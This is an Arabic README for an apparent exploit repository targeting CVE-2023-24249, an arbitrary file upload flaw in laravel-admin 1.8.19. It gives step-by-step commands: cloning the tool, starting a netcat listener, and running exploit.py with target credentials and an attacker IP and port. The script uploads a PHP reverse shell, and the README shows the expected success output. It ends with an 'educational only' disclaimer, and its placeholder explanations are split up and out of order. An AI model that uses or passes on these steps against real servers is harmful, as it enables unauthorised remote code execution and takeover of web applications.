
إكسبلويت لـ CVE-2023-24249 - ثغرة أمنية تسمح بتنفيذ الأوامر عن بعد عبر رفع الملفات وحقن الأوامر.
يحتوي هذا المستودع على سكريبت استغلال لـ CVE-2023-24249، وهي ثغرة أمنية حرجة موجودة في laravel-admin الإصدار 1.8.19. تسمح هذه الثغرة برفع ملفات عشوائي، مما يمكن المهاجمين من تنفيذ كود عشوائي عبر ملف PHP مصمم. يوضح سكريبت الاستغلال كيف يمكن للمهاجم رفع شل عكسي (reverse shell) إلى التطبيق المستهدف وتنفيذه للحصول على وصول عن بعد.
CVE-2023-24249 هي ثغرة رفع ملفات عشوائي في laravel-admin v1.8.19. تسمح هذه الثغرة للمهاجمين برفع وتنفيذ ملفات PHP عشوائية، مما يؤدي إلى تنفيذ كود عن بعد محتمل.
يقوم سكريبت الاستغلال المقدم بأتمتة عملية استغلال CVE-2023-24249. يقوم بالخطوات التالية:
requestsbeautifulsoup4قم بتثبيت المكتبات المطلوبة باستخدام pip:
pip install requests beautifulsoup4
استنساخ المستودع:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
ابدأ مستمعًا على جهازك:
nc -lvnp <PORT>
شغّل سكريبت الاستغلال:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
استبدل <TARGET_URL> و <USERNAME> و <PASSWORD> و <YOUR_IP> و <YOUR_PORT> بالقيم المناسبة:
<TARGET_URL>: عنوان URL للتطبيق المستهدف.<USERNAME>: اسم المستخدم للمصادقة.<PASSWORD>: كلمة المرور للمصادقة.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
إذا كان الاستغلال ناجحًا، فسيقوم السكريبت بإخراج:
[+] تم رفع الشل العكسي بنجاح! جاري محاولة تنفيذه...
[+] تم تنفيذ الشل العكسي بنجاح! تحقق من المستمع الخاص بك على <YOUR_IP>:<YOUR_PORT>
هذا السكريبت مخصص للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذا السكريبت ضد أي نظام دون إذن صريح غير قانوني وغير أخلاقي. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر يسببه هذا السكريبت.
<YOUR_IP>: عنوان IP الخاص بك لاستقبال اتصال الشل العكسي.<YOUR_PORT>: المنفذ الذي يعمل عليه المستمع الخاص بك.